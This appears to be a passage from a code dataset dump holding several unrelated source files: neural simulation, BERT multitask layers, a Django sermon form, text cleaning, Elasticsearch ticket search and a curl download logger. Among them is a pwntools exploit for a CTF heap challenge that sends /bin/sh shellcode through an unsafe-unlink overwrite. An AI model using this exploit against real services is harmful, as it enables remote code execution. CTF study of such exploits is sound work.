= foody\n sl.foodxx = foodx\n sl.foodyy = foody\n\n\n@network_operation(dt=2 * ms)\ndef update_plot(t):\n global foodx, foody, bug_plot, food_plot, sr_plot, sl_plot, outbugx, outbugy, outbugang, outfoodx, outfoody, outsrx, outsry, outslx, outsly, step\n step += 1\n if step % 10 == 0:\n print('Close all figures')\n plt.close('all')\n indx = int(.5 * t / ms + 1)\n bug_plot[0].remove()\n food_plot[0].remove()\n sr_plot[0].remove()\n sl_plot[0].remove()\n bug_x_coords = [bug.x, bug.x - 4 * cos(bug.angle), bug.x - 8 * cos(bug.angle)] # ant-like body\n bug_y_coords = [bug.y, bug.y - 4 * sin(bug.angle), bug.y - 8 * sin(bug.angle)]\n outbugx[indx - 1] = bug.x[0]\n outbugy[indx - 1] = bug.y[0]\n outbugang[indx - 1] = bug.angle[0]\n outfoodx[indx - 1] = foodx\n outfoody[indx - 1] = foody\n outsrx[indx - 1] = sr.x[0]\n outsry[indx - 1] = sr.y[0]\n outslx[indx - 1] = sl.x[0]\n outsly[indx - 1] = sl.y[0]\n bug_plot = plot(bug_x_coords, bug_y_coords, 'ko') # Plot the bug's current position\n sr_plot = plot([bug.x, sr.x], [bug.y, sr.y], 'b')\n sl_plot = plot([bug.x, sl.x], [bug.y, sl.y], 'r')\n food_plot = plot(foodx, foody, 'b*')\n axis([-100, 100, -100, 100])\n title(\"Time: \"+str(2*step)+\"ms\")\n draw()\n\n # print \".\"\n pause(0.05)\n\n\n# ML = StateMonitor(sl, ('v', 'I'), record=True)\n# MR = StateMonitor(sr, ('v', 'I'), record=True)\n# MB = StateMonitor(bug, ('motorl', 'motorr', 'speed', 'angle', 'x', 'y'), record = True)\nrun(duration * ms, report='text')\nnp.save('outbugx', outbugx)\nnp.save('outbugy', outbugy)\nnp.save('outbugang', outbugang)\nnp.save('outfoodx', outfoodx)\nnp.save('outfoody', outfoody)\nnp.save('outsrx', outsrx)\nnp.save('outsry', outsry)\nnp.save('outslx', outslx)\nnp.save('outsly', outsly)\n\n\n\n\n\n\n\n\n\n","sub_path":"Exploration3/braitenbug_brain_skel2018.py","file_name":"braitenbug_brain_skel2018.py","file_ext":"py","file_size_in_byte":6158,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"528531379","text":"import transformers\nfrom bert_multitask_learning.params import BaseParams\nimport tensorflow as tf\nfrom typing import Dict, Tuple\nfrom tensorflow_addons.layers.crf import CRF\nfrom tensorflow_addons.text.crf import crf_log_likelihood\nimport tensorflow_addons as tfa\n\nfrom . import modeling\nfrom .utils import load_transformer_model\nfrom .top_utils import gather_indexes\n\nfrom functools import partial\n\n\n@tf.function\ndef empty_tensor_handling_loss(labels, logits, loss_fn):\n if tf.equal(tf.size(labels), 0):\n return 0.0\n if tf.equal(tf.size(tf.shape(labels)), 0):\n return 0.0\n if tf.equal(tf.shape(labels)[0], 0):\n return 0.0\n else:\n return tf.reduce_mean(loss_fn(\n labels, logits, from_logits=True))\n\n\nclass SequenceLabel(tf.keras.Model):\n def __init__(self, params: BaseParams, problem_name: str):\n super(SequenceLabel, self).__init__(name=problem_name)\n self.params = params\n self.problem_name = problem_name\n num_classes = self.params.num_classes[self.problem_name]\n self.dense = tf.keras.layers.Dense(num_classes, activation=None)\n\n self.dropout = tf.keras.layers.Dropout(1-params.dropout_keep_prob)\n\n if self.params.crf:\n self.crf = CRF(num_classes)\n self.metric_fn = tf.keras.metrics.Accuracy(\n name='{}_acc'.format(self.problem_name)\n )\n else:\n self.metric_fn = tf.keras.metrics.SparseCategoricalAccuracy(\n name='{}_acc'.format(self.problem_name))\n\n def return_crf_result(self, labels: tf.Tensor, logits: tf.Tensor, mode: str, input_mask: tf.Tensor):\n input_mask.set_shape([None, None])\n viterbi_decoded, potentials, sequence_length, chain_kernel = self.crf(\n logits, input_mask)\n if mode != tf.estimator.ModeKeys.PREDICT:\n loss = -crf_log_likelihood(potentials,\n labels, sequence_length, chain_kernel)[0]\n loss = tf.reduce_mean(loss)\n self.add_loss(loss)\n acc = self.metric_fn(\n labels, viterbi_decoded, sample_weight=input_mask)\n self.add_metric(acc)\n\n # make the crf prediction has the same shape as non-crf prediction\n return tf.one_hot(viterbi_decoded, name='%s_predict' % self.problem_name, depth=self.params.num_classes[self.problem_name])\n\n def call(self, inputs, mode):\n training = (mode == tf.estimator.ModeKeys.TRAIN)\n feature, hidden_feature = inputs\n hidden_feature = hidden_feature['seq']\n if mode != tf.estimator.ModeKeys.PREDICT:\n labels = feature['{}_label_ids'.format(self.problem_name)]\n # sometimes the length of labels dose not equal to length of inputs\n # that's caused by tf.data.experimental.bucket_by_sequence_length in multi problem scenario\n pad_len = tf.shape(input=hidden_feature)[\n 1] - tf.shape(input=labels)[1]\n\n # top, bottom, left, right\n pad_tensor = [[0, 0], [0, pad_len]]\n labels = tf.pad(tensor=labels, paddings=pad_tensor)\n\n else:\n labels = None\n hidden_feature = self.dropout(hidden_feature, training)\n\n if self.params.crf:\n return self.return_crf_result(labels, hidden_feature, mode, feature['model_input_mask'])\n\n logits = self.dense(hidden_feature)\n\n if mode != tf.estimator.ModeKeys.PREDICT:\n loss = empty_tensor_handling_loss(\n labels, logits,\n tf.keras.losses.sparse_categorical_crossentropy)\n self.add_loss(loss)\n acc = self.metric_fn(\n labels, logits, sample_weight=feature['model_input_mask'])\n self.add_metric(acc)\n return tf.nn.softmax(\n logits, name='%s_predict' % self.problem_name)\n\n\nclass Classification(tf.keras.layers.Layer):\n def __init__(self, params: BaseParams, problem_name: str) -> None:\n super(Classification, self).__init__(name=problem_name)\n self.params = params\n self.problem_name = problem_name\n num_classes = self.params.num_classes[self.problem_name]\n self.dense = tf.keras.layers.Dense(num_classes, activation=None)\n self.metric_fn = tf.keras.metrics.SparseCategoricalAccuracy(\n name='{}_acc'.format(self.problem_name))\n\n self.dropout = tf.keras.layers.Dropout(1-params.dropout_keep_prob)\n\n def call(self, inputs, mode):\n training = (mode == tf.estimator.ModeKeys.TRAIN)\n feature, hidden_feature = inputs\n hidden_feature = hidden_feature['pooled']\n if mode != tf.estimator.ModeKeys.PREDICT:\n labels = feature['{}_label_ids'.format(self.problem_name)]\n else:\n labels = None\n hidden_feature = self.dropout(hidden_feature, training)\n logits = self.dense(hidden_feature)\n\n if mode != tf.estimator.ModeKeys.PREDICT:\n labels = tf.squeeze(labels)\n # convert labels to one-hot to use label_smoothing\n one_hot_labels = tf.one_hot(\n labels, depth=self.params.num_classes[self.problem_name])\n loss_fn = partial(tf.keras.losses.categorical_crossentropy,\n from_logits=True, label_smoothing=self.params.label_smoothing)\n\n loss = empty_tensor_handling_loss(\n one_hot_labels, logits,\n loss_fn)\n self.add_loss(loss)\n acc = self.metric_fn(labels, logits)\n self.add_metric(acc)\n return tf.nn.softmax(\n logits, name='%s_predict' % self.problem_name)\n\n\nclass PreTrain(tf.keras.Model):\n def __init__(self, params: BaseParams, problem_name: str, input_embeddings: tf.Tensor):\n super(PreTrain, self).__init__(name=problem_name)\n self.params = params\n self.nsp = transformers.modeling_tf_bert.TFBertNSPHead(\n self.params.bert_config)\n\n # TODO: add mlm back to pretrain\n self.mlm = transformers.modeling_tf_bert.TFBertMLMHead(\n self.params.bert_config, input_embeddings=input_embeddings)\n\n def call(self,\n inputs: Tuple[Dict[str, Dict[str, tf.Tensor]], Dict[str, Dict[str, tf.Tensor]]],\n mode: str) -> Tuple[tf.Tensor, tf.Tensor]:\n features, hidden_features = inputs\n\n # compute logits\n nsp_logits = self.nsp(hidden_features['pooled'])\n\n # masking is done inside the model\n seq_hidden_feature = hidden_features['seq']\n positions = features['masked_lm_positions']\n\n # gather_indexes will flatten the seq hidden_states, we need to reshape\n # back to 3d tensor\n input_tensor = gather_indexes(seq_hidden_feature, positions)\n shape_tensor = tf.shape(positions)\n shape_list = tf.concat([shape_tensor, [-1]], axis=0)\n input_tensor = tf.reshape(input_tensor, shape=shape_list)\n # set_shape to determin rank\n input_tensor.set_shape(\n [None, None, seq_hidden_feature.shape.as_list()[-1]])\n mlm_logits = self.mlm(input_tensor)\n\n if mode != tf.estimator.ModeKeys.PREDICT:\n nsp_labels = tf.squeeze(\n features['next_sentence_label_ids'])\n mlm_labels = features['masked_lm_ids']\n mlm_labels.set_shape([None, None])\n # compute loss\n nsp_loss = empty_tensor_handling_loss(\n nsp_labels, nsp_logits,\n tf.keras.losses.sparse_categorical_crossentropy)\n mlm_loss_layer = transformers.modeling_tf_utils.TFMaskedLanguageModelingLoss()\n # mlm_loss = tf.reduce_mean(\n # mlm_loss_layer.compute_loss(mlm_labels, mlm_logits))\n\n # add a useless from_logits argument to match the function signature of keras losses.\n def loss_fn_wrapper(labels, logits, from_logits=True):\n return mlm_loss_layer.compute_loss(labels, logits)\n mlm_loss = empty_tensor_handling_loss(\n mlm_labels,\n mlm_logits,\n loss_fn_wrapper\n )\n loss = nsp_loss + mlm_loss\n self.add_loss(loss)\n\n return (tf.sigmoid(nsp_logits), tf.nn.softmax(mlm_logits))\n\n\nclass Seq2Seq(tf.keras.Model):\n def __init__(self, params: BaseParams, problem_name: str):\n super(Seq2Seq, self).__init__(name=problem_name)\n self.params = params\n self.problem_name = problem_name\n if self.params.init_weight_from_huggingface:\n self.decoder = load_transformer_model(\n self.params.transformer_decoder_model_name,\n self.params.transformer_decoder_model_loading)\n else:\n self.decoder = load_transformer_model(\n self.params.bert_decoder_config, self.params.transformer_decoder_model_loading)\n\n def call(self,\n inputs: Tuple[Dict[str, Dict[str, tf.Tensor]], Dict[str, Dict[str, tf.Tensor]]],\n mode: str):\n features, hidden_features = inputs\n encoder_output = hidden_features['seq']\n if mode != tf.estimator.ModeKeys.PREDICT:\n labels = features['%s_label_ids' % self.problem_name]\n label_mask = features['{}_mask'.format(self.problem_name)]\n encoder_mask = features['model_input_mask']\n\n # batch_loss, logits, hidden_states of all layers\n batch_loss, logits, _ = self.decoder({'input_ids': labels,\n 'attention_mask': label_mask,\n 'encoder_hidden_states': encoder_output,\n 'encoder_attention_mask': encoder_mask,\n 'labels': labels})\n\n # loss = self.create_loss(\n # batch_loss, features['%s_loss_multiplier' % problem_name])\n # # If a batch does not contain input instances from the current problem, the loss multiplier will be empty\n # # and loss will be NaN. Replacing NaN with 0 fixes the problem.\n # loss = tf.compat.v1.where( # pylint: disable=unexpected-keyword-arg,no-value-for-parameter\n # tf.math.is_nan(loss), tf.zeros_like(loss), loss)\n loss = tf.reduce_mean(batch_loss)\n self.add_loss(loss)\n return tf.nn.softmax(logits)\n\n else:\n bos_id = self.params.bos_id\n init_tensor = tf.ones(\n (tf.shape(encoder_output)[0], 1), dtype=tf.int32) * bos_id\n eos_id = self.params.eos_id\n pred = self.decoder.generate(\n input_ids=init_tensor,\n max_length=self.params.decode_max_seq_len,\n min_length=2,\n early_stopping=True,\n num_beams=self.params.beam_size,\n bos_token_id=bos_id,\n eos_token_id=eos_id,\n use_cache=True\n )\n return pred\n\n\n# class Seq2Seq(TopLayer):\n# # pylint: disable=attribute-defined-outside-init\n# '''Top model for seq2seq problem.\n# This is basically a decoder of encoder-decoder framework.\n# Here uses transformer decoder architecture with beam search support.\n# '''\n\n# def __call__(self, features, hidden_feature, mode, problem_name):\n# self.decoder = load_transformer_model(\n# self.params.transformer_decoder_model_name,\n# self.params.transformer_decoder_model_loading)\n# scope_name = self.params.share_top[problem_name]\n# encoder_output = hidden_feature['seq']\n# if mode != tf.estimator.ModeKeys.PREDICT:\n# labels = features['%s_label_ids' % problem_name]\n# label_mask = features['{}_mask'.format(problem_name)]\n# encoder_mask = features['model_input_mask']\n\n# batch_loss, logits = self.decoder({'input_ids': labels,\n# 'attention_mask': label_mask,\n# 'encoder_hidden_states': encoder_output,\n# 'encoder_attention_mask': encoder_mask,\n# 'labels': labels})\n\n# # loss = self.create_loss(\n# # batch_loss, features['%s_loss_multiplier' % problem_name])\n# # # If a batch does not contain input instances from the current problem, the loss multiplier will be empty\n# # # and loss will be NaN. Replacing NaN with 0 fixes the problem.\n# # loss = tf.compat.v1.where( # pylint: disable=unexpected-keyword-arg,no-value-for-parameter\n# # tf.math.is_nan(loss), tf.zeros_like(loss), loss)\n# loss = tf.reduce_mean(batch_loss)\n# self.loss = loss\n\n# if mode == tf.estimator.ModeKeys.TRAIN:\n# return self.loss\n# else:\n# return self.eval_metric_fn(\n# features, logits, loss, problem_name, features['%s_mask' % problem_name])\n\n# else:\n# bos_id = self.params.bos_id\n# init_tensor = tf.ones(\n# (tf.shape(encoder_output)[0], 1), dtype=tf.int32) * bos_id\n# eos_id = self.params.eos_id\n# self.pred = tf.identity(self.decoder.generate(\n# input_ids=init_tensor,\n# max_length=self.params.decode_max_seq_len,\n# min_length=2,\n# early_stopping=True,\n# num_beams=self.params.beam_size,\n# bos_token_id=bos_id,\n# eos_token_id=eos_id,\n# use_cache=True\n# ),\n# name='%s_predict' % scope_name)\n# return self.pred\n\n\nclass MultiLabelClassification(tf.keras.layers.Layer):\n def __init__(self, params: BaseParams, problem_name: str) -> None:\n super(MultiLabelClassification, self).__init__(name=problem_name)\n self.params = params\n self.problem_name = problem_name\n self.dense = tf.keras.layers.Dense(\n self.params.num_classes[problem_name])\n self.dropout = tf.keras.layers.Dropout(\n 1-self.params.dropout_keep_prob\n )\n self.metric_fn = tfa.metrics.F1Score(\n num_classes=self.params.num_classes[problem_name],\n threshold=self.params.multi_cls_threshold,\n average='macro',\n name='{}_f1'.format(problem_name))\n\n def call(self, inputs, mode):\n training = (mode == tf.estimator.ModeKeys.TRAIN)\n feature, hidden_feature = inputs\n hidden_feature = hidden_feature['pooled']\n if mode != tf.estimator.ModeKeys.PREDICT:\n labels = feature['{}_label_ids'.format(self.problem_name)]\n else:\n labels = None\n hidden_feature = self.dropout(hidden_feature, training)\n logits = self.dense(hidden_feature)\n\n if mode != tf.estimator.ModeKeys.PREDICT:\n labels = tf.squeeze(labels)\n labels = tf.cast(labels, tf.float32)\n # use weighted loss\n label_weights = self.params.multi_cls_positive_weight\n\n def _loss_fn_wrapper(x, y, from_logits=True):\n return tf.nn.weighted_cross_entropy_with_logits(x, y, pos_weight=label_weights, name='{}_loss'.format(self.problem_name))\n loss = empty_tensor_handling_loss(\n labels, logits, _loss_fn_wrapper)\n self.add_loss(loss)\n f1 = self.metric_fn(labels, logits)\n self.add_metric(f1)\n\n return tf.nn.sigmoid(\n logits, name='%s_predict' % self.problem_name)\n\n\nclass MultimodalPretrain(tf.keras.Model):\n \"\"\"Multimodal pretrain top layer.\n\n This includes following tasks:\n - Multi-modal MLM\n - Cross modal alignment\n\n \"\"\"\n\n def __init__(self, params: BaseParams, problem_name: str) -> None:\n super(MultimodalPretrain, self).__init__(name=problem_name)\n self.params = params\n self.problem_name = problem_name\n\n def call(self, input, mode):\n pass\n","sub_path":"bert_multitask_learning/top.py","file_name":"top.py","file_ext":"py","file_size_in_byte":16148,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"192626983","text":"from pwn import *\n\n\nheap_size = 260\nshellcode = '\\x31\\xc0\\x50\\x68\\x2f\\x2f\\x73\\x68\\x68\\x2f\\x62\\x69\\x6e\\x89\\xe3\\x50\\x89\\xe2\\x53\\x89\\xe1\\xb0\\x0b\\xcd\\x80'\nexit_func = 0x0804c8ac\n\nr = remote('localhost', 1234)\nr.recvuntil('[size=755]\\n')\ndata = r.recvline()\nheap_addr = int(data[data.index('=')+1:data.index('=')+8], 16)\nlog.info('heap_addr: ' + hex(heap_addr))\n\n# Fake chunk\npayload = p32(0x04eb)\npayload += '\\x90' * 100\npayload += shellcode\npayload += '\\x90' * (heap_size - len(payload))\n\n# Unsafe unlink exploitation through Duble Free Bug\npayload += p32(1)\npayload += p32(exit_func - 8)\npayload += p32(heap_addr)\n\nr.sendline(payload)\nr.recv(4096)\nr.interactive()\n","sub_path":"2014/DEFCON/Babys_First/babyfirst-heap/exploit.py","file_name":"exploit.py","file_ext":"py","file_size_in_byte":662,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"148105051","text":"from django.forms.utils import ErrorList\nfrom django import forms\n\nfrom kanisa import conf\nfrom kanisa.forms import KanisaBaseModelForm, BootstrapDateField\nfrom kanisa.forms.widgets import (\n KanisaMainInputWidget,\n KanisaThumbnailFileWidget\n)\nfrom mutagen.mp3 import MP3\nfrom mutagen.easyid3 import EasyID3\nfrom mutagen.id3 import ID3NoHeaderError, TIT2\n\nfrom kanisa.models import (SermonSeries,\n Sermon,\n SermonSpeaker)\n\n\nclass SermonSeriesForm(KanisaBaseModelForm):\n class Meta:\n model = SermonSeries\n widgets = {'details': KanisaMainInputWidget(),\n 'image': KanisaThumbnailFileWidget(130, 130), }\n fields = (\n 'title',\n 'image',\n 'intro',\n 'details',\n 'active',\n 'passage',\n )\n\n\nclass SermonSpeakerForm(KanisaBaseModelForm):\n class Meta:\n model = SermonSpeaker\n widgets = {'biography': KanisaMainInputWidget(), }\n fields = ('forename', 'surname', 'image', 'biography', )\n\n\nclass SermonForm(KanisaBaseModelForm):\n date = BootstrapDateField()\n no_mp3 = forms.BooleanField(\n initial=False,\n required=False,\n widget=forms.HiddenInput\n )\n\n class Meta:\n model = Sermon\n widgets = {'details': KanisaMainInputWidget(),\n 'transcript': KanisaMainInputWidget()}\n fields = (\n 'title',\n 'date',\n 'series',\n 'speaker',\n 'passage',\n 'mp3',\n 'details',\n 'transcript',\n 'no_mp3',\n )\n\n def apply_id3(self, cleaned_data):\n try:\n audio = EasyID3(self.files['mp3'].temporary_file_path())\n except ID3NoHeaderError:\n audio = MP3(self.files['mp3'].temporary_file_path())\n audio[\"TIT2\"] = TIT2(encoding=3, text=[cleaned_data['title']])\n audio.save()\n audio = EasyID3(self.files['mp3'].temporary_file_path())\n\n audio = EasyID3(self.files['mp3'].temporary_file_path())\n audio['title'] = cleaned_data['title']\n audio['artist'] = unicode(cleaned_data['speaker'])\n\n if not cleaned_data['series']:\n album_title = 'Sermons from %s' % conf.KANISA_CHURCH_NAME\n else:\n album_title = unicode(cleaned_data['series'])\n\n audio['album'] = album_title\n\n audio['albumartistsort'] = conf.KANISA_CHURCH_NAME\n audio['organization'] = conf.KANISA_CHURCH_NAME\n audio['genre'] = 'Speech'\n\n # Not sure if this date format is right - the MP3 players I've\n # got to test with don't show anything more than the year.\n if 'date' in cleaned_data:\n audio['date'] = cleaned_data['date'].strftime('%Y%m%d')\n\n audio.save()\n\n def clean(self):\n super(SermonForm, self).clean()\n cleaned_data = self.cleaned_data\n\n if 'mp3' in self.files:\n if hasattr(self.files['mp3'], 'temporary_file_path'):\n audio = MP3(self.files['mp3'].temporary_file_path())\n else:\n # You probably need to set FILE_UPLOAD_HANDLERS to\n # django.core.files.uploadhandler.TemporaryFileUploadHandler\n audio = None\n\n if audio is None or not audio.info or audio.info.sketchy:\n errors = ErrorList(['Please upload a valid MP3.'])\n self._errors[\"mp3\"] = errors\n del cleaned_data[\"mp3\"]\n else:\n self.apply_id3(cleaned_data)\n else:\n show_mp3_warning = not self.cleaned_data.get(\"no_mp3\", False)\n if not self.instance.pk and show_mp3_warning:\n # We've got no MP3 file, and we've not seen this error\n # before - let's check that was intentional.\n self.data[\"no_mp3\"] = True\n raise forms.ValidationError(\n 'No MP3 was uploaded - if that was intentional, please '\n 'click \\'Save Sermon\\' again.')\n\n return cleaned_data\n","sub_path":"kanisa/forms/sermons.py","file_name":"sermons.py","file_ext":"py","file_size_in_byte":4112,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"18350968","text":"'''Some useful RegEx'''\nimport re\nimport pandas as pd\nfrom nltk.corpus import stopwords\nfrom nltk.tokenize import word_tokenize\nfrom nltk.stem import PorterStemmer\n\n# Stemmer\nps = PorterStemmer()\n\n# Stop words\nSTOP_WORDS = stopwords.words('english')\n\n# Regex for emails\nEMAIL_RE = re.compile(r'^([a-zA-Z0-9_\\-\\.]+)\\\n @((\\[[0-9]{1,3}\\.[0-9]{1,3}\\.[0-9]{1,3}\\.)\\\n |(([a-zA-Z0-9\\-]+\\.)+))\\\n ([a-zA-Z]{2,4}|[0-9]{1,3})\\\n (\\]?)$')\n\n\n# Regex for web addresses\nWEB_ADDR_RE = re.compile(r'(https?:\\/\\/(?:www\\.|(?!www))\\\n [a-zA-Z0-9][a-zA-Z0-9-]+[a-zA-Z0-9]\\.[^\\s]{2,}\\\n |www\\.[a-zA-Z0-9][a-zA-Z0-9-]+[a-zA-Z0-9]\\\n \\.[^\\s]{2,}|https?:\\/\\/(?:www\\.|(?!www))\\\n [a-zA-Z0-9]+\\.[^\\s]{2,}\\\n |www\\.[a-zA-Z0-9]+\\.[^\\s]{2,})')\n\n\n# Regex for punctuations/symbols\nSYMBOLS_RE = re.compile(r'[^\\w\\s]')\n\n# Leading and trailing white spaces\nLEAD_TRAIL_SPACE_RE = re.compile(r'^\\s+|\\s+$')\n\n# Excessive white spaces\nSPACE_RE = re.compile(r'\\s+')\n\n# Numbers and decimal numbers\nDEC_RE = re.compile(r'[0-9]+(\\.[0-9]+)?')\n\n\ndef clean_text(dfs):\n '''\n Clean text by applying the above RegExs\n\n Args:\n dfs: categorical dataframe series to clean\n\n Returns:\n text: clean dataframe series\n '''\n text = dfs\n\n # Lowercase\n text = text.apply(lambda x: x.lower())\n\n # Remove e-mail adresses\n text = text.apply(lambda x: EMAIL_RE.sub('', x))\n\n # Remove web addesses\n text = text.apply(lambda x: WEB_ADDR_RE.sub('', x))\n\n # Remove symbols\n text = text.apply(lambda x: SYMBOLS_RE.sub('', x))\n\n # Remove numbers\n text = text.apply(lambda x: DEC_RE.sub('', x))\n\n # Remove leading and trailing whitespaces\n text = text.apply(lambda x: LEAD_TRAIL_SPACE_RE.sub('', x))\n\n # Remove excessive whitespaces in the middle\n text = text.apply(lambda x: SPACE_RE.sub(' ', x))\n\n # Remove stop words\n # Token each sentence (row)\n # Create a list of the tokens if these tokens are not stop words\n # Convert each row (which is a list of tokens) back to a string (a sentence)\n text = text.apply(lambda x: ' '.join([t for t in word_tokenize(x) if t not in STOP_WORDS]))\n\n # Stemming\n text = text.apply(lambda x: ' '.join([ps.stem(t) for t in word_tokenize(x)]))\n\n # Return the clean text\n return text\n","sub_path":"ML DS DL/preprocess_text_data.py","file_name":"preprocess_text_data.py","file_ext":"py","file_size_in_byte":2500,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"82835166","text":"from __future__ import print_function\r\nimport sys\r\nimport requests\r\nfrom elasticsearch import Elasticsearch\r\nimport json\r\nfrom pprint import pprint\r\nimport re\r\nimport nltk\r\nimport heapq\r\n\r\nclass Ticket:\r\n def __init__(self):\r\n self.incidentId=None\r\n self.description=None\r\n self.summary=None\r\n self.status=None\r\n self.issueType=None\r\n self.componentName=None\r\n self.application=None\r\n\r\n\r\ntry:\r\n es=Elasticsearch([{'host':'localhost','port':9200}])\r\nexcept:\r\n print(\"failed to connect to elasticsearch service\")\r\n# search for the ticket id \r\nincidentId=\"INFNIA-3929\"\r\nres=es.search(index=\"ticket\",doc_type='ticketsnia',body={'query':{'match_phrase':{\r\n 'incidentId':incidentId\r\n }}})\r\nt1=Ticket()\r\nfor hit in res['hits']['hits']:\r\n t1.incidentId=hit['_source']['incidentId']\r\n t1.description=hit['_source']['description']\r\n t1.summary=hit['_source']['summary']\r\n t1.status=hit['_source']['status']\r\n t1.issueType=hit['_source']['issueType']\r\n t1.componentName=hit['_source']['componentName']\r\n t1.application=hit['_source']['application']\r\n\r\n\r\nclass Result:\r\n def __init__(self):\r\n self.incidentId=None\r\n self.score=0\r\n self.summary=None\r\n\r\ndef summerization_Text(text):\r\n article_text = text\r\n # Removing Square Brackets and Extra Spaces\r\n article_text = re.sub(r'\\[[0-9]*\\]', ' ', article_text) \r\n article_text = re.sub(r'\\s+', ' ', article_text) \r\n # Removing special characters and digits\r\n formatted_article_text = re.sub('[^a-zA-Z]', ' ', article_text ) \r\n formatted_article_text = re.sub(r'\\s+', ' ', formatted_article_text) \r\n #converting text to sentences\r\n sentence_list = nltk.sent_tokenize(article_text) \r\n stopwords = nltk.corpus.stopwords.words('english')\r\n notstopword=['not','down','up']\r\n stopwords2=[]\r\n for word in stopwords:\r\n if word not in notstopword:\r\n stopwords2.append(word)\r\n stopwords=stopwords2\r\n sentTokens=[]\r\n for word in nltk.word_tokenize(formatted_article_text): \r\n if word not in stopwords:\r\n sentTokens.append(word)\r\n summary=' '.join(sentTokens)\r\n return summary\r\n\r\n\r\ndef elasticsearch_Searching_Phrase(tkts):\r\n re=es.search(index=\"ticket\",doc_type='ticketsnia',body={\r\n \"size\":20,\r\n \"query\":{\r\n \"bool\":{\r\n \"must\":[\r\n {\"match_phrase\":{\"description\":{\"query\":tkts.description,\"fuzziness\":\"Auto\"}}},\r\n {\"match_phrase\":{\"summary\":{\"query\":tkts.summary,\"fuzziness\":\"Auto\"}}},\r\n {\"match_phrase\":{\"componentName\":tkts.componentName}}\r\n ],\r\n \"should\":[\r\n {\"match\":{\"issueType\":tkts.issueType}},\r\n {\"match\":{\"status\":tkts.status}}\r\n ]\r\n \r\n }\r\n }\r\n })\r\n score1=[]\r\n id1=[]\r\n for hit in re['hits']['hits']:\r\n tkt1=Result()\r\n tkt1.incidentId=hit['_source']['incidentId']\r\n tkt1.score=hit['_score']\r\n tkt1.summary=hit['_source']['summary']\r\n score1.append(tkt1)\r\n id1.append(hit['_id'])\r\n return score1,id1\r\n\r\n\r\ndef elasticsearch_Searching(tkts):\r\n re=es.search(index=\"ticket\",doc_type='ticketsnia',body={\r\n \"size\":20,\r\n \"query\":{\r\n \"bool\":{\r\n \"must\":[\r\n {\"match\":{\"description\":tkts.description}},\r\n {\"match\":{\"summary\":tkts.summary}},\r\n {\"match\":{\"componentName\":tkts.componentName}}\r\n ],\r\n \"should\":[\r\n {\"match\":{\"issueType\":tkts.issueType}},\r\n {\"match\":{\"status\":tkts.status}}\r\n ]\r\n \r\n }\r\n }\r\n })\r\n score1=[]\r\n id1=[]\r\n for hit in re['hits']['hits']:\r\n tkt1=Result()\r\n tkt1.incidentId=hit['_source']['incidentId']\r\n tkt1.score=hit['_score']\r\n tkt1.summary=hit['_source']['summary']\r\n id1.append(hit['_id'])\r\n score1.append(tkt1)\r\n return score1,id1 \r\n\r\n\r\n\r\n\r\n\r\nres1,id1=elasticsearch_Searching_Phrase(t1)\r\nif len(res1)==0:\r\n t1.description=summerization_Text(t1.description)\r\n res1,id1=elasticsearch_Searching(t1)\r\nmsg=''\r\nfor i in res1:\r\n msg+=i.incidentId+\" \"+(str)(i.score)+\" \"+i.summary+\"\\n\"\r\nprint(\"incidentId \\t score \\t summary\")\r\nprint(msg)\r\nprint(id1)\r\nprint(\"################################################################################################\")\r\nt2=Ticket()\r\nt2.description=\"problem we had previously in INFNIA-3924 is being repeated. Could you please help\"\r\nt2.summary=\"Stopping at login not able to login\"\r\nt2.componentName=\"CAS/Admin\"\r\nt2.issueType=\"Incident\"\r\nt2.status=\"Resolved closed\"\r\nres1,id1=elasticsearch_Searching_Phrase(t2)\r\nif len(res1)==0:\r\n t1.description=summerization_Text(t2.description)\r\n res1,id1=elasticsearch_Searching(t2)\r\nmsg=''\r\nfor i in res1:\r\n msg+=i.incidentId+\" \"+(str)(i.score)+\" \"+i.summary+\"\\n\"\r\nprint(\"incidentId \\t score \\t summary\")\r\nprint(msg)\r\nprint(id1)","sub_path":"similiartickts.py","file_name":"similiartickts.py","file_ext":"py","file_size_in_byte":5164,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"553241616","text":"from os import name\nfrom os import system\nfrom typing import List\nfrom os.path import isfile\n\n\ndef parse(file_path: str) -> List[int]:\n fp = open(file_path)\n line = fp.readline()\n if line is None:\n print(\"empty file\")\n return\n res = list()\n while line:\n if line.count(':') is 6:\n split = list(filter(lambda x: x is not '', line.split(' ')))\n if split[6] is not '0':\n if split[6][-1] is 'k':\n res.append(int(split[6][0:-1]))\n else:\n res.append(int(int(split[6])/1000))\n line = fp.readline()\n return res\n\n\ndef plot(data: List[int]) -> None:\n try:\n import matplotlib.pyplot as pp\n pp.plot(data)\n pp.xlabel('Time passed in s')\n pp.ylabel('Download in MB/s')\n pp.grid()\n pp.show()\n except ImportError:\n print(\"Matplotlib not installed, skipping printing\")\n\n\ndef handle(file_path: str, source: str):\n if input(\"just parse existing data? [Y/n]: \") != 'n':\n if isfile(file_path) is False:\n print(\"logfile does not exist\"); exit(0)\n data = parse(file_path)\n plot(data)\n exit(0)\n\n # posix system only\n if name is not 'posix':\n print(\"use a posix system. shutting down\")\n exit(1)\n\n if isfile(file_path):\n if input(\"Delete old file?[y/N]: \") == 'y':\n system(\"rm \" + file_path)\n\n while True:\n\n system('curl --max-time 10000 -o /dev/null ' + source + '://rogue-01.cs.uni-bonn.de/PA.log >> ' + file_path + ' 2>&1')\n\n data = parse(file_path)\n plot(data)\n\n print(\"do you want to continue? [Y/n]\")\n if input() is 'n':\n exit(0)\n\n\nvar = input(\"Mode? [h]ttp/[f]tp: \")\nif var == 'h':\n file_path = 'web.logs'\n source = 'http'\nelif var == 'f':\n file_path = 'ftp.logs'\n source = 'ftp'\nelse:\n print(\"error\")\n exit(0)\nhandle(file_path, source)\n","sub_path":"practical/Exercise 2/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1959,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"555641843","text":"import unittest\nfrom braphy.graph_measures.measure_parser import MeasureParser\nfrom braphy.graph_measures.measure_triangles import MeasureTriangles\nfrom braphy.graph import 